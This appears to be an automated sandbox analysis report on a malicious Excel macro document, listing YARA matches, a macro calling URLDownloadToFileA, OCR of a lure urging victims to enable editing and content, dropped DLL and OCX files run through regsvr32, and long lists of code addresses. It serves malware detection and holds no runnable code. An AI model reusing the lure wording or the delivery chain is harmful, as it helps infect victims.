                        Source: Yara matchFile source: 00000007.00000002.462225822.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.467760078.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.462181637.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.467692271.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.472981981.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.457498778.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.435154889.0000000000160000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.482238250.0000000000230000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

                        System Summary

                        barindex
                        Found malicious Excel 4.0 Macro
                        Source: Documento.xlsmMacro extractor: Sheet: EFWFSFG contains: URLDownloadToFileA
                        Source: Documento.xlsmMacro extractor: Sheet: EFWFSFG contains: URLDownloadToFileA
                        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                        Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CC 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 Id 1 p p
                        Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CC 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 Id 1 p p
                        Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                        Source: Document image extraction number: 0Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                        Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                        Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                        Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                        Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                        Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                        Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                        Source: Screenshot number: 12Screenshot OCR: ENABLE EDITING" and "ENABLE CC 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 Id 1 p p
                        Office process drops PE file
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\xxw1.ocxJump to dropped file
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BRqk58WkNweubruYwrLOt[1].dllJump to dropped file
                        Found Excel 4.0 Macro with suspicious formulas
                        Source: Documento.xlsmInitial sample: EXEC
                        Source: Documento.xlsmInitial sample: EXEC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100492743_2_10049274
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1003D6363_2_1003D636
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1004380C3_2_1004380C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1004D8FC3_2_1004D8FC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1001B9A43_2_1001B9A4
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1004FAC13_2_1004FAC1
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1003DB093_2_1003DB09
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1004DE3E3_2_1004DE3E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1003DEDD3_2_1003DEDD
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1003C1E03_2_1003C1E0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1003E2E93_2_1003E2E9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1004E3803_2_1004E380
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100124903_2_10012490
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1003E7093_2_1003E709
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1004EA443_2_1004EA44
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1004AB9E3_2_1004AB9E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10044FE63_2_10044FE6
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001B81313_2_001B8131
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001B416E3_2_001B416E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001A82D23_2_001A82D2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001A88443_2_001A8844
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001A4B403_2_001A4B40
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001B4E543_2_001B4E54
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001C0E7A3_2_001C0E7A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001A8FE93_2_001A8FE9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001A303A3_2_001A303A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001A50CF3_2_001A50CF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001C13A33_2_001C13A3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001A364E3_2_001A364E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001C1E493_2_001C1E49
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001BFECB3_2_001BFECB
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001B604B3_2_001B604B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001A806B3_2_001A806B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001AC1513_2_001AC151
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001BE1683_2_001BE168
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001A22F73_2_001A22F7
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001A43133_2_001A4313
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001C23B93_2_001C23B9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001AA4DE3_2_001AA4DE
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001AE4F53_2_001AE4F5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001AC4E53_2_001AC4E5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001B05033_2_001B0503
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001C05F63_2_001C05F6
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001BE5ED3_2_001BE5ED
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001AE65A3_2_001AE65A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001BA6833_2_001BA683
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001B66C83_2_001B66C8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001B86EE3_2_001B86EE
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001A27103_2_001A2710
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001B27833_2_001B2783
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001BA9163_2_001BA916
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001B490E3_2_001B490E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001B89663_2_001B8966
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001B69983_2_001B6998
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001AA9CF3_2_001AA9CF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001C0A013_2_001C0A01
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001ACA3C3_2_001ACA3C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001B2B1F3_2_001B2B1F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001AED0A3_2_001AED0A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001ACDE03_2_001ACDE0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001B6E973_2_001B6E97
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001AAEBB3_2_001AAEBB
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001BEEC23_2_001BEEC2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001B8EF83_2_001B8EF8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001BAF0B3_2_001BAF0B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001A2F363_2_001A2F36
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001BCFA03_2_001BCFA0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001A70133_2_001A7013
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001B90543_2_001B9054
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001B70983_2_001B7098
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001B30943_2_001B3094
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001BD15E3_2_001BD15E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001B519C3_2_001B519C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001A71E33_2_001A71E3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001B32313_2_001B3231
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001B92853_2_001B9285
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001A93433_2_001A9343
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001AD4BC3_2_001AD4BC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001BD4AE3_2_001BD4AE
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001A958A3_2_001A958A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001B35A33_2_001B35A3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001BF5D93_2_001BF5D9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001B77303_2_001B7730
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001A77613_2_001A7761
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001B17D23_2_001B17D2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001BF7F43_2_001BF7F4
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001A186B3_2_001A186B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001A188C3_2_001A188C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001B39833_2_001B3983
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001BF9AF3_2_001BF9AF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001C1A0A3_2_001C1A0A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001B9A0C3_2_001B9A0C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001A1A5F3_2_001A1A5F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001BFAD13_2_001BFAD1
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001ABB143_2_001ABB14
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001B1B293_2_001B1B29
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001B7B9E3_2_001B7B9E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001A9C1B3_2_001A9C1B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001BBD633_2_001BBD63
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001A1DCA3_2_001A1DCA
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001B7E3D3_2_001B7E3D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001B3E893_2_001B3E89
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001BDF2B3_2_001BDF2B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001A3F5A3_2_001A3F5A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001C1FC73_2_001C1FC7
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023303A4_2_0023303A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00250E7A4_2_00250E7A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002388444_2_00238844
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00251E494_2_00251E49
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023364E4_2_0023364E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00244E544_2_00244E54
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002350CF4_2_002350CF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024FECB4_2_0024FECB
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002382D24_2_002382D2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002481314_2_00248131
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024416E4_2_0024416E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00234B404_2_00234B40
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024D15E4_2_0024D15E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002513A34_2_002513A3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00238FE94_2_00238FE9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002432314_2_00243231
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00247E3D4_2_00247E3D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023CA3C4_2_0023CA3C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00250A014_2_00250A01
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00249A0C4_2_00249A0C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00251A0A4_2_00251A0A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002370134_2_00237013
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00239C1B4_2_00239C1B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023806B4_2_0023806B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023186B4_2_0023186B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024604B4_2_0024604B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002490544_2_00249054
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023E65A4_2_0023E65A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00231A5F4_2_00231A5F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024D4AE4_2_0024D4AE
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023AEBB4_2_0023AEBB
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023D4BC4_2_0023D4BC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002492854_2_00249285
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024A6834_2_0024A683
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00243E894_2_00243E89
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023188C4_2_0023188C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002430944_2_00243094
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00246E974_2_00246E97
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002470984_2_00247098
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023C4E54_2_0023C4E5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002486EE4_2_002486EE
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002322F74_2_002322F7
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023E4F54_2_0023E4F5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00248EF84_2_00248EF8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024EEC24_2_0024EEC2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002466C84_2_002466C8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024FAD14_2_0024FAD1
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023A4DE4_2_0023A4DE
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00241B294_2_00241B29
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024DF2B4_2_0024DF2B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002477304_2_00247730
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00232F364_2_00232F36
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002405034_2_00240503
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023ED0A4_2_0023ED0A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024490E4_2_0024490E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024AF0B4_2_0024AF0B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002343134_2_00234313
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024A9164_2_0024A916
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002327104_2_00232710
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023BB144_2_0023BB14
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00242B1F4_2_00242B1F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002377614_2_00237761
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002489664_2_00248966
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024BD634_2_0024BD63
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024E1684_2_0024E168
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002393434_2_00239343
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023C1514_2_0023C151
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00233F5A4_2_00233F5A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024CFA04_2_0024CFA0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002435A34_2_002435A3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024F9AF4_2_0024F9AF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002523B94_2_002523B9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002439834_2_00243983
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002427834_2_00242783
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023958A4_2_0023958A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024519C4_2_0024519C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00247B9E4_2_00247B9E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002469984_2_00246998
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002371E34_2_002371E3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023CDE04_2_0023CDE0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024E5ED4_2_0024E5ED
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024F7F44_2_0024F7F4
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002505F64_2_002505F6
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00251FC74_2_00251FC7
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00231DCA4_2_00231DCA
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023A9CF4_2_0023A9CF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002417D24_2_002417D2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024F5D94_2_0024F5D9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0030303A5_2_0030303A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00320E7A5_2_00320E7A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00314E545_2_00314E54
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_003088445_2_00308844
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00321E495_2_00321E49
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0030364E5_2_0030364E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_003082D25_2_003082D2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0031FECB5_2_0031FECB
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_003050CF5_2_003050CF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_003181315_2_00318131
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0031416E5_2_0031416E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0031D15E5_2_0031D15E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00304B405_2_00304B40
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_003213A35_2_003213A3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00308FE95_2_00308FE9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_003132315_2_00313231
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00317E3D5_2_00317E3D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0030CA3C5_2_0030CA3C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_003070135_2_00307013
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00309C1B5_2_00309C1B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00320A015_2_00320A01
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00321A0A5_2_00321A0A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00319A0C5_2_00319A0C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0030806B5_2_0030806B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0030186B5_2_0030186B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_003190545_2_00319054
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0030E65A5_2_0030E65A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00301A5F5_2_00301A5F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0031604B5_2_0031604B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0030AEBB5_2_0030AEBB
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0030D4BC5_2_0030D4BC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0031D4AE5_2_0031D4AE
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_003130945_2_00313094
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00316E975_2_00316E97
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_003170985_2_00317098
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0031A6835_2_0031A683
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_003192855_2_00319285
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00313E895_2_00313E89
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0030188C5_2_0030188C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0030E4F55_2_0030E4F5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_003022F75_2_003022F7
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00318EF85_2_00318EF8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0030C4E55_2_0030C4E5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_003186EE5_2_003186EE
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0031FAD15_2_0031FAD1
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0030A4DE5_2_0030A4DE
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0031EEC25_2_0031EEC2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_003166C85_2_003166C8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_003177305_2_00317730
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00302F365_2_00302F36
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00311B295_2_00311B29
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0031DF2B5_2_0031DF2B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_003027105_2_00302710
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_003043135_2_00304313
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0030BB145_2_0030BB14
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0031A9165_2_0031A916
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00312B1F5_2_00312B1F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_003105035_2_00310503
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0031AF0B5_2_0031AF0B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0030ED0A5_2_0030ED0A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0031490E5_2_0031490E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_003077615_2_00307761
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0031BD635_2_0031BD63
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_003189665_2_00318966
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0031E1685_2_0031E168
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0030C1515_2_0030C151
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00303F5A5_2_00303F5A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_003093435_2_00309343
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_003223B95_2_003223B9
